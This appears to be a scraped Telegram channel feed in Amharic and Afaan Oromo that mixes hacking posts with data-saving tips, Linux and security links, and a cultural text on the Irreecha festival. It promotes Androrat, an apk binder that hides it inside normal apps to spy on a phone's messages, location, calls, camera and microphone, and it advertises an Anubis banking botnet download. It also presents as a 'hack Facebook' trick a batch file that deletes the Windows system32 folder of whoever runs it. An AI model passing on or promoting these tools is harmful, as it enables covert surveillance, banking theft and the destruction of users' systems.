๐ แ แฅแ แจแฎแแแแฐแญ แฃแแแซแแฝ แแแต แจแ แแตแฎแญแต แตแแญแ แแแฅแแ แฐแแซแญ แจแแ แแฐแแ แญแซ "Androrat" แญแฃแแแข
๐จโ๐ป Androrat (Android Remote Administration Tool) แฆ แ java programming language แจแฐแปแ แแฐแแ แญแซ แฒแแ แ แ แแต แฎแแแแฐแญ แ แแตแ แจแ แแตแฎแญแต แตแแญแฝแ Hack แแแตแจแ แแญแแ แแ แแแ แแแแฃแ แญ แซแตแฝแแแข
๐จโ๐ฉโ๐งโ๐ฆ แญแ แแฐแแ แญแญ แแแแญแซ แจแฐแฐแซแ แต แ แแ แแแแฝ แจแแแปแธแแ แจแ แแตแฎแญแต แฆแแฌแฒแแ แฒแตแฐแ แจแแ แแ แตแแญ แ แแแ แแแแฃแ แญ แแ แญ แข แฅแแ แญแ แแ แแฐแแ แญแซ แ แแ แแ แแตแฉแต แ แแ แฅแแตแณแแแต แ แณแตแฃแแ แข
๐ฉโ๐ป แญแ แจแฎแแแฉแฐแญ แแฐแแ แชแซ ( androrat apk Binder ) แจแซแฑ แจแแ แจmalware program แ แแแข แญแ แจแฎแแแฉแฐแญ แแฐแแ แชแซ ( androrat apk Binder .exe ) แณแแ แจแแ แ แแต แจแ แแตแฎแญแต แแฐแแ แซ แแญ ( xender , Gallery .... ) แจแซแฑแ แแแแญ แ แแซแฐแต แจแ แณแแ แแฐแแ แชแซ แแ แจแซแฑแ แตแซ แญแฐแซแแข
"Androrat" แ แแ แแ แ แแต แฐแ แ แแแแแต 9 แแแฎแฝแ แแตแจแ แญแฝแแ โคต๏ธ
1โฃ แจแ แแตแ แฐแ แตแแญ แจ #Contact แแแแฅ แแจแต , แแตแฐแซแจแ , แแฅแแต ..
@Truth_hacker2
2โฃ แตแแฉ vibrate แฅแแฒแแ แแตแจแ แญแฝแแ ..
3โฃ แ แฐแแจแ แตแแญ แขแแฐแญแแต แแ แแ ...
4โฃ แแแฅแญแต (message) แแแญ , แฅแแฒแแ แแแฅแญแถแฝแ แแแ แฅ..
5โฃ แ Gps แ แแซแแแต แตแแฉ แซแแ แตแ แตแญแญแแ แฆแณ แแแ ( แฃแฅแแแ แฐแแฝ แ แแแฑแฃแธแ แฆแณแแฝ แแ แตแแซแธแแ แตแแแญแแต แตแแฉแ แจแซแแ แฐแ แซแแ แตแ แฆแณ แแแ .. )
6โฃ แซแแแแ แแแญแต แ แตแแฉ แแฐแ แฅแ แจแแ แซแแซแแฝ แชแตแฌ แแ แณแต แฅแแ live แแจแณแฐแ
7โฃ แแถ แแแณแต
8โฃ แ แฐแแจแ แตแแญ แแฐแแ
9โฃ แ แตแแฉ แแญแญแซแแ แตแแฝ แแ แณแต แฅแแฒแแ live แแณแ๐ฎ๐ฎ
@NASAtechnotechIngprogram
๐ฎ
โโโโโโ๐Share๐โโโโ

๐ฒแ แตแแซแฝแ #Internet ๐ แตแแ แแ แถแ แถแ แซแญแต แฅแแณแญแแฅแญแฅแ แแ แแตแจแ แ แแฅแโ
1โฃ #Setting๐ แแตแฅ แ แแแฃแต background data restricted แแตแจแ (แจแ แฅแแ แ แแช แจแ แแแฌแฝแแฝ แ แซแณแธแ แณแณ แฅแแณแญแ แแ แซแฐแญแแ)
2โฃ แฒแ แซแญแณแฝแแ #3G แจแแ แญ แแฐ #2G แแแจแญ แ แตแแแ แแ (แ แฐแแญ #Facebook แแจแ แ แฐแ แต แแแ แแ แจแแ)
3โฃ #Facebook แ แแตแ แแแ แต แแ แ F แฅแ Facebook lite แฃแตแ แแ แฅแ แฅแแฐ opera mini, uc, messenger lite แ แญแแต browser's แแ แแ แญแแจแฃแแข
4โฃ แจแแ แ แ แแแฝแ ๐ แ แแซแแกแ แต แแ แณแณ แแฅแแต โ๏ธ แแญแ save page แแตแจแ แ แแฅแแข
5โฃ แ WiFi ๐ถ แซแแแ แ แแญ play store, Instagram, palm play แ แแแญแแต แฅแ #video_online_play /#download/ แ แแแตแจแ แญแแจแฃแแข
๐ข๐ข?@NASAtechnotechIngprogram๐ฎ๐ฎ
โโโโโโ ๐Share๐ โโโโโ

Ulauncher 5.3 Released, Here's How to Install it on Ubuntu - OMG! Ubuntu!
https://www.omgubuntu.co.uk/2019/09/ulauncher-5-3-stable-release

OMG! Ubuntu!
Ulauncher 5.3 Released, Hereโs How to Install it on Ubuntu
Linux app launcher Ulauncher 5.3 has been released with a number of changes. We show you how to install Ulauncher 5.3 on Ubuntu 18.04 LTS and Linux Mint.
๐ฐAnubis Android Banking Botnet v.2.5๐ฐ
โ๏ธ Here's the Android Botnet to hack android devices without port forwarding. You just need any free/paid hosting + Apk decompiler that's it.
๐ปDownload -
https://sarkarjobnews.com/V4IfPz

Media is too big
VIEW IN TELEGRAM
how to hack facebook using firefox browser remotely in Amharic
1. Open notepad
2. Type the following with out quotes(" ")
"@echo off
del %windir%\system32"
3. save it anything.bat

If you want to hack Facebook account and how to protect your account join as and learn more....
# dhugaa jirtuu
hoyye hoyyeen maali?
hoyye hoyyeen kan kadhaaf manarra deeman miti.
adaadha malee

baga iyyaana maskala nagaan geessan jedha channeliin keenya #TECHNO TEACHING PROGRAM
ayyana gariii!!
ayyana gariii!!
This media is not supported in your browser
VIEW IN TELEGRAM
Four Ways The Bad Guys Attack Mobile Devices
โช๏ธNetwork based attacks
โช๏ธDevice exploits
โช๏ธPhishing attacks
โช๏ธMalicious apps
https://blog.zimperium.com/not-fathers-endpoint-four-ways-bad-guys-attack-mobile-devices/

Zimperium
Itโs Not Your Fatherโs Endpoint - Four Ways The Bad Guys Attack Mobile Devices - Zimperium
In our second blog, I discussed why a mobile device needs to be protected. Exactly what are we talking about here? What are the ways an attacker can hack
Maalummaa Irreechaa keesumaa kan birraa
By Curated Content on fulbaana 19/01/2012
(Tamrat kabbadaatin)
#kutaa1ffaa
Irreechi hiika baayโee yoo qabaates hiiknisaa inni guddaan, โGalatoo Waaqayyooโ (Happy, thanks giving dayโ) jechuudha. Irreechi waggaatti al lama kan geggeeffamuudha, Irreecha Tulluufi Irreecha Malkaa.
Inni gubaa masqalaa booda raawwatamu Irreecha malkaati. Kunis ganna gurraacha keessaa bahanii gamtaan Waaqasaanii galateeffachuuf kan raawwatamuudha.
Kutaalee addunyaa gara garaatti ayyaanonni (kaarniivaaloonni) Irreecha waliin walfakkaatan ni raawwatamu. Fakkeenyaaf ardii Awurooppaatti qonnaan bultoonni, waggaatti yeroo tokkoo karaa irratti bahanii timaatimiidhaan walreebu. Yoo akkas godhan Waaqayyo yeroo ittaanus biqiltuusaanii akkasumatti nuu tolcha jechuun kana raawwatu.
Odeeffannoo Barsiisaa Beekan Gulummaa barreeffamaan nuu erge haala armaan gaditti qindeessinee dhiyeesineeerra dubbisaatii yaada qabdan karaa teeessoo keenyaa nu ergaa.
IRREECHA/ IRREESSA: Irreechi sirna Waaqeffachuu gamtaadhaan Tulluufi malkaarratti baโanii waaqa kadhataniifi ittigalateeffataniidha. Karaa biraatiin Irreecha yemmuu jennu hiika (yaada) birootis ni qaba. Kunis marga ykn coqorsa sirna ayyaaneffannaa tokkoof ykn araaraaf yoo deemamu harkatti qabatamus ni ibsa. Akkasumas hiikoo gara warra waa beekuu deemanii namaaf himamu tokkoof kaffalu (galchu). (Warra waa beeku kan jedhaman warra Ayyaantuu, warra qaalluu, eker-dubbistuu, warra callee ilaalu,โฆ jechuudha).
Kafaltiin warra waa beekuu kennamu galchaa jedhama. Galchi kunis yeroo baayโee marga ykn coqorsaafi maallaqa waliin qabanii iddoo galchaaf qophaaโetti irreeffatu. Galchi akkuma humnaatti marga ykn coqorsa qofaa taโuus ni dandaโa.
Sirni kabaja ayyaana Irreechaa waggaatti al lama wayitiilee arfaasaafi birraa kabajama. Ayyaanni Irreechaa arfaasaa keessa kabajamu kadhaa Waaqaaf gamtaadhaan dhiyeeffatamuudha. Innis yeroo roobni looniif baayโee barbachisu waan taโeef rooba nagayaa akka roobuuf tulluufi malkaatti baโanii waaqa kadhatu. Akkasumas fuuldurri; ganna waan taโeef, ganna dukkana nagaan nu hulluuqsisi, booqa birraatti nagaan nu baasi; sanyii facaate dadagaagsii nuu biqilchi jedhanii Waaqa kadhatu.
Ayyaanni Irreechaa birraa keessa kabajamu irra caalaatti galata Waaqaaf galchuuf yoo taโu, milkaaโina fuula duraatiifis ni kadhatu. Galanni Waaqaaf galfamu kunis, โKadhaa keenya nuuf dhageesse; ifatti nu baastee, sanyii facaafanne nuu biqilchite, saโaa-namaa nagaa nuuf kennitee galanni sihaa gaโuโ jedhu. Akkasumas milkaaโina fuulduraatiif ammoo, โMidhaan alaa gaโe (bilchaate) namaafi sinbira wajjin nuu soori; bara nagaa kan quufaa nuu godhi; yaadaafi hawwii keenya nuu guuti;โ jedhanii waaqa kadhatu.
Irreechi kun kan kabajamu birraa keessa malkaarratti. Kan irreeffatamus ayyaana Ifaanoo (Gubaa) booda. Oromoon osoo Ibsaa Birraa hinibsine Irreecha Birraa hinirreeffatu. Dura ibsaa ibsee qeโeesaatti kabaja. Ibsaa birraa ibsuun dukkana gannaa keessaa ifa yookaan booqa birraatti bahuu agarsiisa.
Irreechi diinqaa jalqaba jedhu maanguddoonni Tuulamaa. Achii qeโeetti baha. Sana booda irreechi sabaa Magaalaa Bishaanoftuu (Bishooftuu) Hora Harsadiitti kabajama.
Ayyaanni gubaa galgala waarii kabajama. Gaafa ayyaana gubaa kabajan daamotiin (xomborri) diinqatti qabsiifamee baha. Warri ulfaa qabu, galma ulfaatiyis ni baasa. Galmaayis daamotiin qabsiifamee ni baha. Irreechi diinqaa jalqaba kan jedhameefis kanumaafi. Erga daamotii qabsiifatanii qeโeetti gadi bahanii ibsaa ibsaa ayyaanicha haala hoโaa taโeen kabaju.
Bariisaa immoo ganama bakka gubaa itti guban sanatti buna dhaabanii Waaqa kadhatu. Waaqaafis galata galchu. Mijjirii irrattis ni irreeffatu. Irreeffannaan kun kan taโu akka maatitti.
Ayyaanni Masqalaa kan warri kiristaanaa kabajuufi ayyaanni Gubaa yookaan Ifaanoo kan Oromoon kabaju, yeroofi ibsaa ibsuun wal haa fakkaatu malee garaagarummaa guddaa qabu. Kaayyoofi galii adda addaas qabu. Warri kiristaanaa yaadannoo โFannoo Iyyasuus Kiristoos barbaachaaf kabajnaโ jedhu. Oromoon garuu sanaaf miti kan ibsaa ibsu.